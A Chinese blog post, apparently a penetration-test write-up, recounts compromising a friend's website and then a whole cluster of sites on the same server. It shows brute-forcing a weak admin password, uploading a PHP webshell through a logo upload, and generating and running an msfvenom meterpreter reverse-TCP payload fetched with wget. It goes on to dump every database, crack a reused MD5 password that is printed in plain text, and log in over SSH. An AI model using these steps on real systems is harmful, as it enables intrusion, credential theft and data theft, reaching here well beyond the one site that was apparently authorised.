从弱口令到拿下站群服务器

码途开拓者
• 阅读 982

声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。

本文涉及知识点实操练习:DoraBox之文件上传  (通过DoraBox靶场系列闯关练习,了解文件上传漏洞的基础知识及如何进行绕过上传恶意文件。)

一、
前两天我一个朋友给我发来一个链接,说他做的站准备上线,问我能不能做下测试,既然是朋友,那肯定义不容辞,准备开始搞事情。

二、
1、先打开网站浏览一下,发现直接跳转到了登录页面,如下:

从弱口令到拿下站群服务器

简单了尝试了下弱口令、万能密码和登录框xss,发现输入框对输入内容做了严格的过滤,非法字符一概不允许,果断放弃。

2、简单扫描了一下敏感目录,发现一个/adminx,果然这种开放注册的站都会给管理员提供一个专门的登录入口

从弱口令到拿下站群服务器

(忽略这个 1.zip,那是我打包整站时留下的

尝试爆破,弱口令一波带走,进入后台,赶紧把喜讯报告给朋友,让他“惊喜”一下

从弱口令到拿下站群服务器

3、寻找上传点

进到后台之后寻找上传点,发现系统设置处有修改站点logo的功能,先传个php小马试试水

从弱口令到拿下站群服务器

我当场就惊了,你后台登录框过滤那么严格结果你这上传点就这就这??好歹做个本地校验啊,你让burpsuite面子往哪搁?

4、连接shell尝试提权

传了马之后使用蚁剑连接,首先就是查看服务器信息,这里有个小插曲,打开虚拟终端之后无论执行什么命令,返回结果都是 ret=127

从弱口令到拿下站群服务器

应该是服务器上有什么安全软件做了过滤,使用蚁剑自带的插件进行bypass

从弱口令到拿下站群服务器

成功绕过

从弱口令到拿下站群服务器

不过蚁剑的这个绕过连接不太稳定,而且速度也很慢,于是琢磨着建立一个meterpreter会话尝试提权。

5、建立meterpreter 会话

在云服务器上使用msfvenom 生成一个后门:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=服务器ip LPORT=监听端口 -f elf > shell.elf

然后在服务器设置一个监听会话:

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set LHOST 服务器ip

set LPORT 监听端口

run

在服务器上使用python建立一个简单的http服务:

python3 -m http.server

在目标主机使用wget下载后门文件并执行,成功获取meterpreter 会话

6、尝试提权受阻

由于目标服务器运行的是 CentOS 8.0,内核版本为 Linux 4.18.0,且我获取到的仅为一个低权限的shell,想要实现提权是很难的,在明知肯定失败的情况下我还是尝试了脏牛等所有的我手上能用的提权exp,均宣告失败,也是意料之中的事。

7、柳暗花明又一村

提权无果之后,我开始翻动服务器上的各种文件,然后发现了不得了的线索,乖乖这是个站群啊

从弱口令到拿下站群服务器

然后我从每个站的配置文件中都得到了他们对应的数据库以及数据库账号密码,看样子应该是随机生成的,不像是会用作root用户密码的通用密码,如下图:

从弱口令到拿下站群服务器

于是我上传了一个脱裤马,获取到了所有的数据库sql文件,尝试访问所有的数据,以寻求一个可能的通用密码,没想到还真让我找到了,在几个采集站和发卡站的库中,我找到了如下相同的md5值:

从弱口令到拿下站群服务器

md5解密后结果为:vip886.A

从弱口令到拿下站群服务器

尝试ssh连接服务器,成功

从弱口令到拿下站群服务器

至此渗透结束。

8、总结

此次渗透没什么技术含量,但是足以显示出弱口令以及通用密码对于安全的危害有多大,另外上传功能的处理也是很重要的,一丁点防护都没有的上传点我是真头一回见。

从弱口令到拿下站群服务器

漏洞报告已经交给我朋友啦,没想到还有小钱钱拿,开心。

点赞
收藏
评论区
推荐文章
Johnny21 Johnny21
4年前
(重要)必须知道的网安行业相关法律法规及处罚
题记:本文主要梳理了网络安全行业相关的法律法规及相关处罚,涉及违反行政法、民法和刑法的相关内容,此外有三个补充内容,补充1为我国立法体系说明,补充2为国家网络安全政策,补充3为网安执法案例。全文旨在帮助读者从法律层面认识网络安全建设,并提高网络安全防护意识。目录一、行政处罚类型违行政法1.警告2.
Stella981 Stella981
3年前
Linux应急响应(三):挖矿病毒
0x00前言随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式。新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue)、web攻击多种漏洞(如Tomcat弱口令攻击、WeblogicWLS组件漏洞、Jboss
Wesley13 Wesley13
3年前
CTF现代密码
本文涉及知识点实操练习CTF实验室(https://www.oschina.net/action/GoToLink?urlhttps%3A%2F%2Fwww.hetianlab.com%2Fpages%2FCTFLaboratory.jsp)前言:在CTF的密码题目中,RSA以其加密算法之多且应用之广泛,所以在比赛
Stella981 Stella981
3年前
CTF之Five86
靶机地址:http://www.vulnhub.com/entry/five861,417/(https://www.oschina.net/action/GoToLink?urlhttp%3A%2F%2Fwww.vulnhub.com%2Fentry%2Ffive861%2C417%2F)本文涉及知识点实操练习:VulnHub渗透测试实战靶
Wesley13 Wesley13
3年前
ES6 新增的数组的方法
给定一个数组letlist\//wu:武力zhi:智力{id:1,name:'张飞',wu:97,zhi:10},{id:2,name:'诸葛亮',wu:55,zhi:99},{id:3,name:'赵云',wu:97,zhi:66},{id:4,na
Wesley13 Wesley13
3年前
oralce反弹注入攻击实战
作者:BlAck.Eagle声明:严禁按照本文进行攻击等非法操作,后果自负,本文旨在信息安全技术研究估计大家读了《oracle注入实战之渗透联通》一文之后都会为之一震,但是笔者不知道读者朋友有没有遇到过和笔者相似的情况,就是用unionselect语句爆全部的表的时候,根本爆不出来,最多也就能爆出几个来,那该怎么继续呢?这里就用到了我们的UTL
Stella981 Stella981
3年前
Five86
靶机地址:http://www.vulnhub.com/entry/five862,418/(https://www.oschina.net/action/GoToLink?urlhttp%3A%2F%2Fwww.vulnhub.com%2Fentry%2Ffive862%2C418%2F)本文涉及知识点实操练习:相关实验:VulnHub渗透
Wesley13 Wesley13
3年前
HTB
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.68本次使用https://github.com/Tib3rius/AutoRecon进行自动化全方位扫描执行命令 autorecon10.10.10.68
美凌格栋栋酱 美凌格栋栋酱
4个月前
Oracle 分组与拼接字符串同时使用
SELECTT.,ROWNUMIDFROM(SELECTT.EMPLID,T.NAME,T.BU,T.REALDEPART,T.FORMATDATE,SUM(T.S0)S0,MAX(UPDATETIME)CREATETIME,LISTAGG(TOCHAR(
码途开拓者
码途开拓者
Lv1
故园今夕是元宵,独向蛮村坐寂寥
文章
2
粉丝
0
获赞
0